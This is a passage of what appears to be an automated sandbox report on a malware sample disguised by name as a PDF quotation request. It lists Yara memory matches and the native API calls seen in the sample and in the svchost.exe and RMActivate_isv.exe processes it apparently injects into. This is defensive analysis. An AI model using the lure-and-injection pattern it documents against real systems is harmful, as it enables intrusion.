                Source: Yara matchFile source: 0000000B.00000002.3134574203.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1642068110.0000000004A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: Quotation request -30112024_pdf.exe
                Source: initial sampleStatic PE information: Filename: Quotation request -30112024_pdf.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042C173 NtClose,7_2_0042C173
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040A87F NtAllocateVirtualMemory,7_2_0040A87F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72B60 NtClose,LdrInitializeThunk,7_2_03C72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03C72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C735C0 NtCreateMutant,LdrInitializeThunk,7_2_03C735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C74340 NtSetContextThread,7_2_03C74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C74650 NtSuspendThread,7_2_03C74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72BE0 NtQueryValueKey,7_2_03C72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72BF0 NtAllocateVirtualMemory,7_2_03C72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72B80 NtQueryInformationFile,7_2_03C72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72BA0 NtEnumerateValueKey,7_2_03C72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72AD0 NtReadFile,7_2_03C72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72AF0 NtWriteFile,7_2_03C72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72AB0 NtWaitForSingleObject,7_2_03C72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72FE0 NtCreateFile,7_2_03C72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72F90 NtProtectVirtualMemory,7_2_03C72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72FA0 NtQuerySection,7_2_03C72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72FB0 NtResumeThread,7_2_03C72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72F60 NtCreateProcessEx,7_2_03C72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72F30 NtCreateSection,7_2_03C72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72EE0 NtQueueApcThread,7_2_03C72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72E80 NtReadVirtualMemory,7_2_03C72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72EA0 NtAdjustPrivilegesToken,7_2_03C72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72E30 NtWriteVirtualMemory,7_2_03C72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72DD0 NtDelayExecution,7_2_03C72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72DB0 NtEnumerateKey,7_2_03C72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72D00 NtSetInformationFile,7_2_03C72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72D10 NtMapViewOfSection,7_2_03C72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72D30 NtUnmapViewOfSection,7_2_03C72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72CC0 NtQueryVirtualMemory,7_2_03C72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72CF0 NtOpenProcess,7_2_03C72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72CA0 NtQueryInformationToken,7_2_03C72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72C60 NtCreateKey,7_2_03C72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72C70 NtFreeVirtualMemory,7_2_03C72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72C00 NtQueryInformationProcess,7_2_03C72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C73090 NtSetValueKey,7_2_03C73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C73010 NtOpenDirectoryObject,7_2_03C73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C739B0 NtGetContextThread,7_2_03C739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C73D70 NtOpenThread,7_2_03C73D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C73D10 NtOpenProcessToken,7_2_03C73D10
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03534340 NtSetContextThread,LdrInitializeThunk,11_2_03534340
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03534650 NtSuspendThread,LdrInitializeThunk,11_2_03534650
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532B60 NtClose,LdrInitializeThunk,11_2_03532B60
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03532BF0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532BE0 NtQueryValueKey,LdrInitializeThunk,11_2_03532BE0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_03532BA0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532AD0 NtReadFile,LdrInitializeThunk,11_2_03532AD0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532AF0 NtWriteFile,LdrInitializeThunk,11_2_03532AF0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532F30 NtCreateSection,LdrInitializeThunk,11_2_03532F30
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532FE0 NtCreateFile,LdrInitializeThunk,11_2_03532FE0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532FB0 NtResumeThread,LdrInitializeThunk,11_2_03532FB0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532EE0 NtQueueApcThread,LdrInitializeThunk,11_2_03532EE0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_03532E80
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532D10 NtMapViewOfSection,LdrInitializeThunk,11_2_03532D10
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_03532D30
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532DD0 NtDelayExecution,LdrInitializeThunk,11_2_03532DD0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_03532DF0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_03532C70
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532C60 NtCreateKey,LdrInitializeThunk,11_2_03532C60
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_03532CA0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035335C0 NtCreateMutant,LdrInitializeThunk,11_2_035335C0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035339B0 NtGetContextThread,LdrInitializeThunk,11_2_035339B0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532B80 NtQueryInformationFile,11_2_03532B80
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532AB0 NtWaitForSingleObject,11_2_03532AB0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532F60 NtCreateProcessEx,11_2_03532F60
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532F90 NtProtectVirtualMemory,11_2_03532F90
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532FA0 NtQuerySection,11_2_03532FA0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532E30 NtWriteVirtualMemory,11_2_03532E30
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532EA0 NtAdjustPrivilegesToken,11_2_03532EA0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532D00 NtSetInformationFile,11_2_03532D00
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532DB0 NtEnumerateKey,11_2_03532DB0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532C00 NtQueryInformationProcess,11_2_03532C00
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532CC0 NtQueryVirtualMemory,11_2_03532CC0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03532CF0 NtOpenProcess,11_2_03532CF0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03533010 NtOpenDirectoryObject,11_2_03533010
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03533090 NtSetValueKey,11_2_03533090
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03533D70 NtOpenThread,11_2_03533D70
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03533D10 NtOpenProcessToken,11_2_03533D10
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E28EC0 NtCreateFile,11_2_02E28EC0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E29320 NtAllocateVirtualMemory,11_2_02E29320
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E29030 NtReadFile,11_2_02E29030
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E291C0 NtClose,11_2_02E291C0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E29120 NtDeleteFile,11_2_02E29120
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033EF875 NtMapViewOfSection,11_2_033EF875
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033EF8D9 NtMapViewOfSection,NtMapViewOfSection,11_2_033EF8D9
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,2_2_00431BE8
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,2_2_00446313
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,2_2_004333BE
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004096A02_2_004096A0
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0042200C2_2_0042200C
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0041A2172_2_0041A217
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004122162_2_00412216
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0042435D2_2_0042435D
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004033C02_2_004033C0
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0044F4302_2_0044F430
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004125E82_2_004125E8
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0044663B2_2_0044663B
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004138012_2_00413801
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0042096F2_2_0042096F
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004129D02_2_004129D0
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004119E32_2_004119E3
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0041C9AE2_2_0041C9AE
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0047EA6F2_2_0047EA6F
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0040FA102_2_0040FA10
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0044EB5F2_2_0044EB5F
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00423C812_2_00423C81
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00411E782_2_00411E78
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00442E0C2_2_00442E0C
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00420EC02_2_00420EC0
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0044CF172_2_0044CF17
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00444FD22_2_00444FD2
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_032636782_2_03263678
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004181737_2_00418173
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004028697_2_00402869
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004010007_2_00401000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004028277_2_00402827
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004028307_2_00402830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040FA637_2_0040FA63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004012007_2_00401200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004163707_2_00416370
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004163737_2_00416373
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040FC837_2_0040FC83
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402D407_2_00402D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040DD037_2_0040DD03
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042E7B37_2_0042E7B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4E3F07_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03D003E67_2_03D003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFA3527_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC02C07_2_03CC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE02747_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF81CC7_2_03CF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03D001AA7_2_03D001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC81587_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C301007_2_03C30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDA1187_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD20007_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3C7C07_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C647507_2_03C64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C407707_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5C6E07_2_03C5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03D005917_2_03D00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C405357_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CEE4F67_2_03CEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF24467_2_03CF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE44207_2_03CE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF6BD77_2_03CF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFAB407_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3EA807_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C429A07_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03D0A9A67_2_03D0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C569627_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6E8F07_2_03C6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C268B87_2_03C268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4A8407_2_03C4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C428407_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C32FC87_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4CFE07_2_03C4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBEFA07_2_03CBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB4F407_2_03CB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C82F287_2_03C82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C60F307_2_03C60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE2F307_2_03CE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFEEDB7_2_03CFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C52E907_2_03C52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFCE937_2_03CFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40E597_2_03C40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFEE267_2_03CFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3ADE07_2_03C3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C58DBF7_2_03C58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4AD007_2_03C4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDCD1F7_2_03CDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C30CF27_2_03C30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0CB57_2_03CE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40C007_2_03C40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C8739A7_2_03C8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2D34C7_2_03C2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF132D7_2_03CF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5B2C07_2_03C5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE12ED7_2_03CE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C452A07_2_03C452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4B1B07_2_03C4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C7516C7_2_03C7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2F1727_2_03C2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03D0B16B7_2_03D0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CEF0CC7_2_03CEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C470C07_2_03C470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF70E97_2_03CF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFF0E07_2_03CFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFF7B07_2_03CFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF16CC7_2_03CF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDD5B07_2_03CDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF75717_2_03CF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C314607_2_03C31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFF43F7_2_03CFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB5BF07_2_03CB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C7DBF97_2_03C7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5FB807_2_03C5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFFB767_2_03CFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CEDAC67_2_03CEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDDAAC7_2_03CDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C85AA07_2_03C85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE1AA37_2_03CE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFFA497_2_03CFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF7A467_2_03CF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB3A6C7_2_03CB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C499507_2_03C49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5B9507_2_03C5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD59107_2_03CD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C438E07_2_03C438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAD8007_2_03CAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C03FD27_2_03C03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C03FD57_2_03C03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C41F927_2_03C41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFFFB17_2_03CFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFFF097_2_03CFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C49EB07_2_03C49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5FDC07_2_03C5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C43D407_2_03C43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF1D5A7_2_03CF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF7D737_2_03CF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFFCF27_2_03CFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB9C327_2_03CB9C32
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035BA35211_2_035BA352
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0350E3F011_2_0350E3F0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035C03E611_2_035C03E6
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035A027411_2_035A0274
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035802C011_2_035802C0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0358815811_2_03588158
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0359A11811_2_0359A118
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_034F010011_2_034F0100
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035B81CC11_2_035B81CC
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035C01AA11_2_035C01AA
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035B41A211_2_035B41A2
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0359200011_2_03592000
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0352475011_2_03524750
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0350077011_2_03500770
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_034FC7C011_2_034FC7C0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0351C6E011_2_0351C6E0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0350053511_2_03500535
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035C059111_2_035C0591
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035B244611_2_035B2446
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035A442011_2_035A4420
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035AE4F611_2_035AE4F6
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035BAB4011_2_035BAB40
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035B6BD711_2_035B6BD7
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_034FEA8011_2_034FEA80
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0351696211_2_03516962
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035029A011_2_035029A0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035CA9A611_2_035CA9A6
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0350A84011_2_0350A840
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0350284011_2_03502840
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0352E8F011_2_0352E8F0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_034E68B811_2_034E68B8
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03574F4011_2_03574F40
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03520F3011_2_03520F30
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035A2F3011_2_035A2F30
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03542F2811_2_03542F28
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_034F2FC811_2_034F2FC8
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0350CFE011_2_0350CFE0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0357EFA011_2_0357EFA0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03500E5911_2_03500E59
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035BEE2611_2_035BEE26
